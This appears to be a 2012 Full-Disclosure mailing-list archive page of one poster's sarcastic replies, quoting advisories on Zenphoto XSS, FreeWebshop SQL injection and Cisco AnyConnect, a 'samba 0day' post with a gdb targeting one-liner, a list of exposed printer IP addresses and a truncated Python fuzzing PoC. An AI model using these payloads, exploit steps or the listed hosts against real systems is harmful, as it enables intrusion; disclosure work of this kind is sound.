Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cookie stealing and XSS vulnerable in Zenphoto version 1.4.3.2

2012-10-02 Thread Benji 
Why did you report this to UKCERT?

On Tue, Oct 2, 2012 at 7:16 AM, Scott Herbert
 wrote:
>
> -
> Affected products:
> -
>
> Product :   Zenphoto 1.4.3.2 (and maybe older) fixed in 1.4.3.3
> Affected function:  printPublishIconLink
>
> --
> Details:
> --
>
> The file admin-news-articles.php calls the function printPublishIconLink
> which generates HTML from data stored in the $_GET super global, this can be
> used to generate a XSS attack or more seriously, as a admin user need to be
> logged in to access the page admin-news-articles.php, a cookie stealing
> script.
>
> Example code:
> http://127.0.0.1/zenphoto/zp-core/zp-extensions/zenpage/admin-news-articles.
> php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3
> C/script%3E%3C>
>
> 
> Suggested fix:
> 
>
> Sanitize the $_GET super global on lines 1637 through 1641 in
> zenpage-admin-functions.php file
>
> 
> Timeline:
> 
>
> 12-Sept-2012  Zenphoto and UK-CERT informed
> 18-Sept-2012 Zenphoto confirmed and fixed (see
> http://www.zenphoto.org/trac/changeset/10836).
> 1-Oct-2012 Zenphoto 1.4.3.3 released fixing hole.
>
> --
> Scott Herbert Cert Web Apps (Open)
> http://blog.scott-herbert.com/
> Twitter @Scott_Herbert
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Paypal BugBounty #9 - Persistent Web Vulnerabilities

2012-10-02 Thread Benji 
..

On Tue, Oct 2, 2012 at 6:40 AM, Vulnerability Lab
 wrote:
> Title:
> ==
> Paypal BugBounty #9 - Persistent Web Vulnerabilities
>
>
> Date:
> =
> 2012-10-02
>
>
> References:
> ===
> http://www.vulnerability-lab.com/get_content.php?id=646
>
>
> VL-ID:
> =
> 646
>
>
> Status:
> 
> Published
>
>
> Disclaimer:
> ===
> The information provided in this advisory is provided as it is without any 
> warranty. Vulnerability-Lab disclaims all warranties,
> either expressed or implied, including the warranties of merchantability and 
> capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including direct, 
> indirect, incidental, consequential loss of business
> profits or special damages, even if Vulnerability-Lab or its suppliers have 
> been advised of the possibility of such damages. Some
> states do not allow the exclusion or limitation of liability for 
> consequential or incidental damages so the foregoing limitation
> may not apply. We do not approve or encourage anybody to break any vendor 
> licenses, policies, deface websites, hack into databases
> or trade with fraud/stolen material.
>
> Domains:www.vulnerability-lab.com   - www.vuln-lab.com
>  - www.vulnerability-lab.com/register
> Contact:ad...@vulnerability-lab.com - 
> supp...@vulnerability-lab.com- resea...@vulnerability-lab.com
> Section:video.vulnerability-lab.com - forum.vulnerability-lab.com 
>  - news.vulnerability-lab.com
> Social: twitter.com/#!/vuln_lab - 
> facebook.com/VulnerabilityLab- 
> youtube.com/user/vulnerability0lab
> Feeds:  vulnerability-lab.com/rss/rss.php   - 
> vulnerability-lab.com/rss/rss_upcoming.php   - 
> vulnerability-lab.com/rss/rss_news.php
>
> Any modified copy or reproduction, including partially usages, of this file 
> requires authorization from Vulnerability Laboratory.
> Permission to electronically redistribute this alert in its unmodified form 
> is granted. All other rights, including the use of other
> media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
> pictures, texts, advisories, sourcecode, videos and
> other information on this website is trademark of vulnerability-lab team & 
> the specific authors or managers. To record, list (feed),
> modify, use or edit our material contact (ad...@vulnerability-lab.com or 
> supp...@vulnerability-lab.com) to get a permission.
>
> Copyright © 2012 | Vulnerability 
> Laboratory
>
>
>
> --
> VULNERABILITY RESEARCH LABORATORY
> LABORATORY RESEARCH TEAM
> CONTACT: resea...@vulnerability-lab.com
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] samba exploit - remote root colonel 0day

2012-09-25 Thread Benji 
Dear genius

I believe the point was to not give credit

lot of love,
captain obvious

On Mon, Sep 24, 2012 at 4:04 PM, Julius Kivimäki
 wrote:
> {*} samba 3.x remote root by  {*}
> Give some credit to the guy who actually made this.
> 2012/9/24 
>>
>>
>> Massive 0day hide all your printers.
>>
>> http://pastebin.com/AwpsBWVQ
>>
>> # finding targets 4 31337z:
>> # gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk
>> '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
>> #-> to get system_libc_addr, enter this value in the
>> 'system_libc_offset' value of the target_finder, run, sit back, wait for
>> shell
>>
>> by kd aka r4c1st of eax
>>
>>
>> Sent using Hushmail
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [HTTPCS] FreeWebshop 'Text' Remote SQL Injection Vulnerability

2012-09-17 Thread Benji 
you seem surprised by the level of idiocy, are you new to this list?

On Mon, Sep 17, 2012 at 2:42 PM, Julius Kivimäki
 wrote:
> Did you guys seriously just send five different advisories on five different
> vulnerable parameters on one vulnerable script?
>
> 2012/9/17 HTTPCS 
>>
>> HTTPCS Advisory : HTTPCS100
>> Product : FreeWebshop
>> Version : 2.2.9
>> Date : 2012-09-17
>> Criticality level : Highly Critical
>> Description : A vulnerability has been discovered in FreeWebshop, which
>> can be exploited by malicious people to conduct SQL injection attacks. Input
>> passed via the 'Text' parameter to '/index.php?page=cart&action=add' is not
>> properly sanitised before being used in a SQL query. This can be exploited
>> to manipulate SQL queries by injecting arbitrary SQL code.
>> Page : /index.php?page=cart&action=add
>> Variables :
>> sub=Bestellen&prodprice=1234.56&numprod=1&prodid=1&Text=[VulnHTTPCS]
>> Type : SQLI
>> Method : POST
>> Solution :
>> References : https://www.httpcs.com/advisory/httpcs100
>> Credit : HTTPCS [Web Vulnerability Scanner]
>> ___
>>
>> Twitter : http://twitter.com/HTTPCS_
>> Free web vulnerability scanner HTTPCS : https://www.httpcs.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Adobe Flash Update Installs Other Warez without Consent

2012-09-08 Thread Benji 
You've been using gmail for 15 years? That's so impressive, it's almost 
unbelievable

Sent from my iPhone

On 8 Sep 2012, at 22:25, Jeffrey Walton  wrote:

> I> is that why you use gmail?
> I know. I'm preparing for a migration now. Its hard throw away 10 or
> 15 years of history.
> 
> On Sat, Sep 8, 2012 at 5:18 PM, Benji  wrote:
>>> Explorer and IE vulnerabilities. Plus, I'm not trying to feed Google
>>> any more data through their back channels by using their browser.
>> 
>> is that why you use gmail?
>> 
>> On Sat, Sep 8, 2012 at 10:14 PM, Jeffrey Walton  wrote:
>>> Hi Chrisitan,
>>> 
>>> [Corrected Title]
>>> 
>>> I'll feed you one last time. Here are the results from a second machine.
>>> 
>>> flash-update-1 shows the web page Flash Update opened to download the 
>>> update.
>>> 
>>> flash-update-2 shows the only preferences or selections presented when
>>> running the EXE downloaded from the previous step.
>>> 
>>> flash-update-3 shows the flash update, and the additional Google crap.
>>> 
>>> WebKit is insecure junk
>>> (http://web.nvd.nist.gov/view/vuln/search-results?query=WebKit&search_type=all&cves=on),
>>> and I don't want it on my machines. Its bad enough I have to manage
>>> Explorer and IE vulnerabilities. Plus, I'm not trying to feed Google
>>> any more data through their back channels by using their browser.
>>> 
>>> Jeff
>>> 
>>> On Sat, Sep 8, 2012 at 7:02 AM, Christian Sciberras  
>>> wrote:
>>>> His initial email doesn't make him look like a newb? Really?
>>>> 
>>>> Quoting: "It appears Adobe has become a whore to Google like Mozilla."
>>>> 
>>>> Typical response from an attention-starved kid. Except he's no kid.
>>>> 
>>>> Hmmm.
>>>> 
>>>> Then there's the whole bullshit he's been talking about - which by the way,
>>>> several people categorically proved to be inaccurate, if not plain wrong.
>>>> 
>>>> On Sat, Sep 8, 2012 at 1:15 AM, Mark  wrote:
>>>>> 
>>>>> You're right. Jeffrey is no newb. Sorry if it came over the wrong way.
>>>>> 
>>>>> On 08/09/2012 0:31, Michael D. Wood wrote:
>>>>>> You guys are acting like Jeffrey is a newb to all this stuff.  I'm sure
>>>>>> he knows what mbam and spybot are, and is able to scan his machine. I'm
>>>>>> sure he knows to go straight to the source when downloading flash
>>>>>> player, albeit Adobe does include the annoying toolbar unless you choose
>>>>>> not to install.
>>>>>> 
>>>>>> --
>>>>>> Michael D. Wood
>>>>>> ITSecurityPros.org
>>>>>> www.itsecuritypros.org
>>>>>> 
>>>>>> - Reply message -
>>>>>> From: "Mark" 
>>>>>> To: 
>>>>>> Cc: "Full Disclosure b" , "BugTraq"
>>>>>> 
>>>>>> Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez
>>>>>> without Consent
>>>>>> Date: Fri, Sep 7, 2012 5:32 pm
>>>>>> 
>>>>>> 
>>>>>> You didn't download it from download.cnet.com, by any chance?
>>>>>> Sounds more like an infection to me.
>>>>>> For windows, download and run the following programs.
>>>>>> http://www.filehippo.com/download_malwarebytes_anti_malware/
>>>>>> http://www.filehippo.com/download_spybot_search_destroy/5168/
>>>>>> http://www.filehippo.com/download_superantispyware/
>>>>>> 
>>>>>> 
>>>>>> On 06/09/2012 19:09, Jeffrey Walton wrote:
>>>>>>> The company that writes the worlds most insecure software [1,2,3] has
>>>>>>> figured out a way to further increase an attack surface.
>>>>>>> 
>>>>>>> Adobe now includes additional warez in their updates without consent.
>>>>>>> The warez includes a browser and tools bar. The attached image is what
>>>>>>> I got when I agreed to update Adobe Flash because of recent security
>>>>>>> vulnerability fixes.
>>>>>>> 
>>>>>>> It appears Adobe has become a whore to Google like Mozilla.
>>>>>>> 
>>>>>>> +1 Adobe.
>>>>>>> 
>>>>>>> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>>>>>>> [2]
>>>>>> 
>>>>>> http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>>>>>>> [3]
>>>>>> 
>>>>>> http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>>>>>>> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Adobe Flash Update Installs Other Warez without Consent

2012-09-08 Thread Benji 
> Explorer and IE vulnerabilities. Plus, I'm not trying to feed Google
> any more data through their back channels by using their browser.

is that why you use gmail?

On Sat, Sep 8, 2012 at 10:14 PM, Jeffrey Walton  wrote:
> Hi Chrisitan,
>
> [Corrected Title]
>
> I'll feed you one last time. Here are the results from a second machine.
>
> flash-update-1 shows the web page Flash Update opened to download the update.
>
> flash-update-2 shows the only preferences or selections presented when
> running the EXE downloaded from the previous step.
>
> flash-update-3 shows the flash update, and the additional Google crap.
>
> WebKit is insecure junk
> (http://web.nvd.nist.gov/view/vuln/search-results?query=WebKit&search_type=all&cves=on),
> and I don't want it on my machines. Its bad enough I have to manage
> Explorer and IE vulnerabilities. Plus, I'm not trying to feed Google
> any more data through their back channels by using their browser.
>
> Jeff
>
> On Sat, Sep 8, 2012 at 7:02 AM, Christian Sciberras  wrote:
>> His initial email doesn't make him look like a newb? Really?
>>
>> Quoting: "It appears Adobe has become a whore to Google like Mozilla."
>>
>> Typical response from an attention-starved kid. Except he's no kid.
>>
>> Hmmm.
>>
>> Then there's the whole bullshit he's been talking about - which by the way,
>> several people categorically proved to be inaccurate, if not plain wrong.
>>
>> On Sat, Sep 8, 2012 at 1:15 AM, Mark  wrote:
>>>
>>> You're right. Jeffrey is no newb. Sorry if it came over the wrong way.
>>>
>>> On 08/09/2012 0:31, Michael D. Wood wrote:
>>> > You guys are acting like Jeffrey is a newb to all this stuff.  I'm sure
>>> > he knows what mbam and spybot are, and is able to scan his machine. I'm
>>> > sure he knows to go straight to the source when downloading flash
>>> > player, albeit Adobe does include the annoying toolbar unless you choose
>>> > not to install.
>>> >
>>> > --
>>> > Michael D. Wood
>>> > ITSecurityPros.org
>>> > www.itsecuritypros.org
>>> >
>>> > - Reply message -
>>> > From: "Mark" 
>>> > To: 
>>> > Cc: "Full Disclosure b" , "BugTraq"
>>> > 
>>> > Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez
>>> > without Consent
>>> > Date: Fri, Sep 7, 2012 5:32 pm
>>> >
>>> >
>>> > You didn't download it from download.cnet.com, by any chance?
>>> > Sounds more like an infection to me.
>>> > For windows, download and run the following programs.
>>> > http://www.filehippo.com/download_malwarebytes_anti_malware/
>>> > http://www.filehippo.com/download_spybot_search_destroy/5168/
>>> > http://www.filehippo.com/download_superantispyware/
>>> >
>>> >
>>> > On 06/09/2012 19:09, Jeffrey Walton wrote:
>>> >> The company that writes the worlds most insecure software [1,2,3] has
>>> >> figured out a way to further increase an attack surface.
>>> >>
>>> >> Adobe now includes additional warez in their updates without consent.
>>> >> The warez includes a browser and tools bar. The attached image is what
>>> >> I got when I agreed to update Adobe Flash because of recent security
>>> >> vulnerability fixes.
>>> >>
>>> >> It appears Adobe has become a whore to Google like Mozilla.
>>> >>
>>> >> +1 Adobe.
>>> >>
>>> >> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>>> >> [2]
>>> >
>>> > http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>>> >> [3]
>>> >
>>> > http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>>> >> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent

2012-09-08 Thread Benji 
Christian, are you suggesting the people from "itsecuritypros.org" are
infact, idiots?!

On Sat, Sep 8, 2012 at 12:02 PM, Christian Sciberras  wrote:
> His initial email doesn't make him look like a newb? Really?
>
> Quoting: "It appears Adobe has become a whore to Google like Mozilla."
>
> Typical response from an attention-starved kid. Except he's no kid.
>
> Hmmm.
>
>
> Then there's the whole bullshit he's been talking about - which by the way,
> several people categorically proved to be inaccurate, if not plain wrong.
>
>
>
>
>
> On Sat, Sep 8, 2012 at 1:15 AM, Mark  wrote:
>>
>> You're right. Jeffrey is no newb. Sorry if it came over the wrong way.
>>
>> On 08/09/2012 0:31, Michael D. Wood wrote:
>> > You guys are acting like Jeffrey is a newb to all this stuff.  I'm sure
>> > he knows what mbam and spybot are, and is able to scan his machine. I'm
>> > sure he knows to go straight to the source when downloading flash
>> > player, albeit Adobe does include the annoying toolbar unless you choose
>> > not to install.
>> >
>> > --
>> > Michael D. Wood
>> > ITSecurityPros.org
>> > www.itsecuritypros.org
>> >
>> > - Reply message -
>> > From: "Mark" 
>> > To: 
>> > Cc: "Full Disclosure b" , "BugTraq"
>> > 
>> > Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez
>> > without Consent
>> > Date: Fri, Sep 7, 2012 5:32 pm
>> >
>> >
>> > You didn't download it from download.cnet.com, by any chance?
>> > Sounds more like an infection to me.
>> > For windows, download and run the following programs.
>> > http://www.filehippo.com/download_malwarebytes_anti_malware/
>> > http://www.filehippo.com/download_spybot_search_destroy/5168/
>> > http://www.filehippo.com/download_superantispyware/
>> >
>> >
>> > On 06/09/2012 19:09, Jeffrey Walton wrote:
>> >> The company that writes the worlds most insecure software [1,2,3] has
>> >> figured out a way to further increase an attack surface.
>> >>
>> >> Adobe now includes additional warez in their updates without consent.
>> >> The warez includes a browser and tools bar. The attached image is what
>> >> I got when I agreed to update Adobe Flash because of recent security
>> >> vulnerability fixes.
>> >>
>> >> It appears Adobe has become a whore to Google like Mozilla.
>> >>
>> >> +1 Adobe.
>> >>
>> >> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>> >> [2]
>> >
>> > http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>> >> [3]
>> >
>> > http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>> >> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
>> >>
>> >>
>> >>
>> >> ___
>> >> Full-Disclosure - We believe in it.
>> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >>
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Splunk Vulnerability

2012-09-06 Thread Benji 
well Im glad we got multiple emails saying you all agree,.

On Thu, Sep 6, 2012 at 8:50 AM, Michael D. Wood  wrote:
> I agree.  Splunk *IS* doing what it was designed to do.
>
>
>
> --
>
> Michael D. Wood
>
> ITSecurityPros.org
>
> www.itsecuritypros.org
>
>
>
> From: JxT [mailto:jxt.li...@gmail.com]
> Sent: Thursday, September 06, 2012 2:19 AM
> To: Zach C.
> Cc: Michael D. Wood; full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Splunk Vulnerability
>
>
>
> On Wed, Sep 5, 2012 at 11:30 PM, Zach C.  wrote:
>
> 1.) The tool, Splunk, is designed to index logs
> 2.) Logs are arbitrary files.
> Therefore,
> 3.) Splunk is designed to index arbitrary files.
>
>
>
> Agreed, Splunk is doing exactly what it's designed to do. This is not a
> vulnerability within Splunk itself.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Printer in the DMZ

2012-08-27 Thread Benji 
Yup, they're all mine. Congrats on ur diskovery of the century. You
know what you should do? you should make some sort of database for
google dorks, like hmm, maybe call it GHDB?

Impressive find, very impressed. If it's people like you that miss the
point of my posts, to point out how absurd this list is and it's many
failings, then I think I have succeeded. Stay classy, keep fighting
whatever fight you're fighting.

On Mon, Aug 27, 2012 at 5:45 PM, Igor Igor  wrote:
> Robots.txt not supported in any printer.. too bad, all listed in all major
> search engine
>
>
> Benji, are they belong to you ? You are the only one that I can think off
> that would put that in a DMZ
>
> 152.1.23.62 - HP ColorLaserJet 2605dn
> 152.1.31.62 - HP ColorLaserJet CP4005
> 152.1.32.10 - Dell 5230n Laser Printer
> 152.1.32.53 - HP Designjet T1100ps 44in
> 152.1.40.7 - HP LaserJet P2055dn
> 152.1.40.8 - HP LaserJet P2055dn
> 152.1.40.14 - HP LaserJet P2055dn
> 152.1.40.16 - HP LaserJet P2055dn
> 152.1.40.34 - HP LaserJet P2055dn
> 152.1.40.42 - HP LaserJet P2055dn
> 152.1.40.54 - HP Color LaserJet 4700
> 152.1.40.88 - HP LaserJet P2055dn
> 152.1.40.97 - HP LaserJet P2055dn
> 152.1.40.120 - HP LaserJet 2300
> 152.1.40.172 - HP LaserJet P2055dn
> 152.1.40.203 - HP LaserJet P2055dn
> 152.1.40.222 - HP LaserJet P2055dn
> 152.1.40.232 - HP LaserJet P2055dn
> 152.1.40.249 - HP LaserJet P2055dn
> 152.1.55.155 - HP Color LaserJet CP4525
> 152.1.72.177 - Dell Color Laser 3110cn
> 152.1.72.244 - HP Procurve
> 152.1.111.13 - Brother HL-5370DW
> 152.1.111.136 - Brother HL-5250DW
> 152.1.111.189 - RICOH Pro 1107EX
> 152.1.117.197 - HP Color LaserJet CP4525
> 152.1.120.67 - HP LaserJet P3005
> 152.1.120.89 - HP LaserJet P2055dn
> 152.1.120.205 - HP LaserJet P3005
> 152.1.120.208 - HP LaserJet 4350
> 152.1.152.23 - HP Color LaserJet CP3505
> 152.1.181.30 - HP Color LaserJet CM3530 MFP
> 152.1.198.230 - HP LaserJet P3015
> 152.1.228.225 - HP LaserJet 9050
> 152.1.228.229 - HP LaserJet 9050
> 152.1.228.230 - HP LaserJet 9050
> 152.14.71.92 - HP Color LaserJet 4700
>
>
>
> - 1g0r

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ZDI-12-149 : Cisco AnyConnect VPN Client Verification Bypass Remote Code Execution Vulnerability

2012-08-22 Thread Benji 
" User interaction is required to exploit this vulnerability in that
the target must visit a malicious page or open a malicious file."

sorry, what?

On Wed, Aug 22, 2012 at 4:48 PM, ZDI Disclosures
 wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> ZDI-12-149 : Cisco AnyConnect VPN Client Verification Bypass Remote Code
> Execution Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-12-149
> August 22, 2012
>
> - -- CVE ID:
> CVE-2012-2494
>
> - -- CVSS:
> 9, AV:N/AC:L/Au:N/C:P/I:P/A:C
>
> - -- Affected Vendors:
> Cisco
>
> - -- Affected Products:
> Cisco AnyConnect VPN Client
>
> - -- Vulnerability Details:
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of Cisco AnyConnect VPN Client. User interaction
> is required to exploit this vulnerability in that the target must visit a
> malicious page or open a malicious file.
>
> The specific flaw exists because the VPN AnyConnect helper program does not
> check the version number of the vpndownloader.exe program it downloads. As
> such it is possible to forcefully install an older version of the
> vpndownloader.exe that is vulnerable to previously patched issues.
>
> - -- Vendor Response:
> Cisco has issued an update to correct this vulnerability. More details can
> be found at:
> http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-
> sa-20120620-ac
>
> - -- Disclosure Timeline:
> 2011-11-22 - Vulnerability reported to vendor
> 2012-08-22 - Coordinated public release of advisory
>
> - -- Credit:
> This vulnerability was discovered by:
> * gwslabs.com
>
> - -- About the Zero Day Initiative (ZDI):
> Established by TippingPoint, The Zero Day Initiative (ZDI) represents
> a best-of-breed model for rewarding security researchers for responsibly
> disclosing discovered vulnerabilities.
>
> Researchers interested in getting paid for their security research
> through the ZDI can find more information and sign-up at:
>
> http://www.zerodayinitiative.com
>
> The ZDI is unique in how the acquired vulnerability information is
> used. TippingPoint does not re-sell the vulnerability details or any
> exploit code. Instead, upon notifying the affected product vendor,
> TippingPoint provides its customers with zero day protection through
> its intrusion prevention technology. Explicit details regarding the
> specifics of the vulnerability are not exposed to any parties until
> an official vendor patch is publicly available. Furthermore, with the
> altruistic aim of helping to secure a broader user base, TippingPoint
> provides this vulnerability information confidentially to security
> vendors (including competitors) who have a vulnerability protection or
> mitigation product.
>
> Our vulnerability disclosure policy is available online at:
>
> http://www.zerodayinitiative.com/advisories/disclosure_policy/
>
> Follow the ZDI on Twitter:
>
> http://twitter.com/thezdi
>
> -BEGIN PGP SIGNATURE-
> Version: PGP Desktop 10.2.0 (Build 1950)
> Charset: utf-8
>
> wsBVAwUBUDT/PFVtgMGTo1scAQLLzgf9HBKVYWR/BvvgxJa3/JvOrqcitJ3YJbtB
> w1mms3xSCBArm9xVo3FyeM4is6+94bG5v6gSD2Q774+1JP8eLsPSJgCGygL8qrxI
> jKKd2vpaIVEska4Q1yGBOaGh/Gbh6zoGOErL1KjbHD2nEG9olu8aKkMw+4JEPewe
> ZtL6XOAPZlPvpR9pG9nAxB4BqyhY10Hc+s35ovQIMQQO9S3GUR18GrVy+bXsQKpe
> nm6ovRLqHaSwq0hCHbHmhKwiCepqV+1KFy9aZSbCXU4VpiaO1N1llDB1L+o3g9bQ
> q9vBUrbuw4rJqb5hSdQSi+ZJylSVmuHTLo8tOHwXmJlK1lrs3lUiww==
> =8yO6
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The Android Superuser App

2012-08-13 Thread Benji 
Ok.

On Mon, Aug 13, 2012 at 2:28 PM, Jann Horn  wrote:
> On Sun, Aug 12, 2012 at 09:47:57PM +0200, Jann Horn wrote:
>> And finally, I've found another vuln that essentially lets apps gain root
>> rights without asking the user, and I will release all details about it in
>> two weeks.
>
> Found another independent vuln that also gives all apps root access, details
> will go public in two weeks, too.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WTB: CIK and Fortezza card

2012-08-13 Thread Benji 
but with bowling 4 crypto as email, natural and logical 2 assume u
plan big crypto massacre, how many innocent bits will we lose this
time?


On Sat, Aug 11, 2012 at 8:07 PM, Hambone Turkey
 wrote:
> So I know FD isn't Craigslist but I figured its my best bet.  I am looking
> for a KSD-64 Crypto Ignition Key (CIK) as well as a Fortezza card.  If you
> know where I can get either, please contact me.  Note that
> http://www.psism.com lists Fortezza cards on their website but they don't
> sell them anymore.  FWIW I am a US citizen...so no, I'm not a spy :P
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hacker Highschool v2

2012-08-09 Thread Benji 
ah fantastic, a lesson on trolling and bullying. what a valuable
service you are providing.

On Thu, Aug 9, 2012 at 8:19 PM, Pete Herzog  wrote:
> Hi,
>
> Version 2 of Hacker Highschool (www.hackerhighschool.org) is wrapping
> up. We will begin publishing/replacing each lesson as we finish it. Of
> course we can always use more dedicated experts to contribute which
> would speed the whole process up.
>
> More details on the project are available in a new article:
>
> http://opensource.com/life/12/8/hacker-highschool-students-learn-redesign-future
>
> FYI: since then, we've added 1 more lesson
>
>#22 Trolling and Bullying
>
> Enjoy!
>
> Sincerely,
> -pete.
>
>
> --
> Pete Herzog - Managing Director - p...@isecom.org
> ISECOM - Institute for Security and Open Methodologies
> www.isecom.org - www.osstmm.org
> www.hackerhighschool.org - www.badpeopleproject.org
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC

2012-07-30 Thread Benji 
wait, this was a serious email? not like this bro, not like this.

On Sun, Jul 29, 2012 at 11:08 PM, kaveh ghaemmaghami
 wrote:
> I think ur on vacation now aren't u  Plus nobody ask u to read my
> post and i am not interested about ur opinion keep it for yourself
>
> On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami
>  wrote:
>> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
>> Crash : http://imageshack.us/f/217/axman.jpg/
>> Date: July 28, 2012
>> Author: coolkaveh
>> coolka...@rocketmail.com
>> Https://twitter.com/coolkaveh
>> Vendor Homepage: http://digitaloffense.net/tools/axman/
>> version : 1.0.0
>> Tested on: windows 7 SP1
>> 
>> Crash The Exploiter
>>  Lame HD Moore fuzzer Memory Corruption
>>   By Awsome coolkaveh
>>
>> ---
>>
>> import os
>> import win32api
>> crash = "  Crash The Exploiter  "
>> lame="Lame HD Moore fuzzer Memory corruption  "
>> awsome="   By Awsome coolkaveh  "
>> print
>> print
>> print
>> print crash
>> print
>> print lame
>> print
>> print awsome
>> print
>> print
>> print
>> print
>> exploit = ("\x90" *800)
